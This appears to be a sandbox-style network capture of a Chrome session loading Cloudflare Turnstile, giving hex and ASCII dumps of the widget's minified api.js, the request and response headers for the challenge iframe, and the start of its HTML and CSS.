                                                        2025-03-17 16:42:28 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                        Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                        Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                        Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72
                                                        Data Ascii: manual",e.Auto="auto"})(ee||(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74
                                                        Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22
                                                        Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77
                                                        Data Ascii: ect.setPrototypeOf||function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73
                                                        Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
                                                        2025-03-17 16:42:28 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28
                                                        Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449735104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:29 UTC856OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/ HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: iframe
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:29 UTC1297INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 28126
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                        content-security-policy: default-src 'none'; script-src 'nonce-WfTkzWR1jp37Awfh' 'unsafe-eval'; script-src-attr 'none'; worker-src blob:; style-src 'unsafe-inline'; img-src 'self'; connect-src 'self'; frame-src 'self' blob:; child-src 'self' blob:; form-action 'none'; base-uri 'self'; sandbox allow-same-origin allow-scripts allow-popups allow-forms
                                                        cross-origin-embedder-policy: require-corp
                                                        cross-origin-opener-policy: same-origin
                                                        cross-origin-resource-policy: cross-origin
                                                        origin-agent-cluster: ?1
                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        2025-03-17 16:42:29 UTC411INData Raw: 63 72 69 74 69 63 61 6c 2d 63 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2c 20 55 41 2d 42 69 74 6e 65 73 73 2c 20 55 41 2d 41 72 63 68 2c 20 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 4d 6f 62 69 6c 65 2c 20 55 41 2d 4d 6f 64 65 6c 2c 20 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 50
                                                        Data Ascii: critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-P
                                                        2025-03-17 16:42:29 UTC1030INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 65 26 23 78 32 37 3b 3b 20 73 63 72 69 70 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 63 65 2d 57 66 54 6b 7a 57 52 31 6a 70 33 37 41 77 66 68 26 23 78 32 37 3b 20 26 23 78 32 37 3b 75 6e 73 61 66 65 2d
                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="x-ua-compatible" content="IE=Edge,chrome=1"> <meta http-equiv="content-security-policy" content="default-src &#x27;none&#x27;; script-src &#x27;nonce-WfTkzWR1jp37Awfh&#x27; &#x27;unsafe-
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 33 30 70 78 20 30 20 30 20 23 64 65 31 33 30 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 32 33 32 33 32 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 66 66 66 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 30 31 29 7d 74 6f 7b 74 72 61 6e 73 66 6f
                                                        Data Ascii: ames fillfail{to{box-shadow:inset 0 30px 0 0 #de1303}}@keyframes fillfail-offlabel{to{box-shadow:inset 0 0 0 30px #232323}}@keyframes fillfail-offlabel-dark{to{box-shadow:inset 0 0 0 30px #fff}}@keyframes scale-up-center{0%{transform:scale(.01)}to{transfo
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 6f 76 65 72 72 75 6e 2d 69 2c 23 73 70 69 6e 6e 65 72 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 66 61 69 6c 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 38 35 2c 2e 36 38 2c 2e 35 33 29 20 62 6f 74 68 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 64 65 31 33 30 33 7d 23 66 61 69 6c 2d 69 2c 23 73 75 63 63 65 73 73 2d 69 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a
                                                        Data Ascii: -align:right}#overrun-i,#spinner-i{animation:spin 5s linear infinite;display:flex;height:30px;width:30px}#fail-i{animation:scale-up-center .6s cubic-bezier(.55,.085,.68,.53) both;box-shadow:inset 0 0 0 #de1303}#fail-i,#success-i{border-radius:50%;display:
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 3a 23 30 61 61 39 33 37 3b 66 69 6c 6c 3a 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 78 70 69 72 65 64 2d 63 69 72 63 6c 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 74 69 6d 65 6f 75 74 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 39 39 39 3b 66 69 6c 6c 3a 23 39 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78
                                                        Data Ascii: shadow:inset 0 0 0 #0aa937}.theme-dark .success-circle{stroke:#0aa937;fill:#0aa937}.theme-dark .expired-circle,.theme-dark .timeout-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#999;fill:#999}.theme-dark #ex
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 31 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65
                                                        Data Ascii: 1}.theme-dark h1{color:#fff}.theme-dark #challenge-error-title{color:#ffa299}.theme-dark #challenge-error-title a,.theme-dark #challenge-error-title a:link,.theme-dark #challenge-error-title a:visited{color:#bbb}.theme-dark #challenge-error-title a:active
                                                        2025-03-17 16:42:29 UTC1369INData Raw: 72 65 73 68 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 76 65 72 6c 61 79 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 3b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e
                                                        Data Ascii: resh-link:active,.theme-dark #timeout-refresh-link:focus,.theme-dark #timeout-refresh-link:hover{color:#949494}.theme-dark .overlay{border-color:#ffa299;color:#ffa299}.theme-dark .error-message,.theme-dark .error-message a,.theme-dark .error-message a:lin
